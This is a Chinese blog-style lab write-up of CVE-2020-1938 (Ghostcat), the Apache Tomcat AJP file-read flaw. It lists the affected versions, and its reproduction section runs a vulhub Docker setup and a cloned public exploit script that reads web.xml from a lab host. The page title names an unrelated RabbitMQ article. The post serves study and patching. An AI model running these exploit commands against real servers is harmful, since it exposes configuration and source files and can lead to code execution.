0
点赞
收藏
分享

微信扫一扫

【RabbitMQ 实战】11 队列的结构和惰性队列

悄然丝语 2023-10-14 阅读 21

漏洞简介

CVE-2020-1938是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。

影响版本

Apache Tomcat 9.x < 9.0.31

Apache Tomcat 8.x < 8.5.51

Apache Tomcat 7.x < 7.0.100

Apache Tomcat 6.x

漏洞复现

/vulhub/tomcat/CVE-2020-1938
docker-compose up -d
git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.47.129 -p 8009 -f /WEB-INF/web.xml

在这里插入图片描述

读取到web.xml,漏洞复现成功

漏洞原理

能力不足,参考:
https://blog.csdn.net/m0_61506558/article/details/127907633

修复建议

升级版本

举报

相关推荐

0 条评论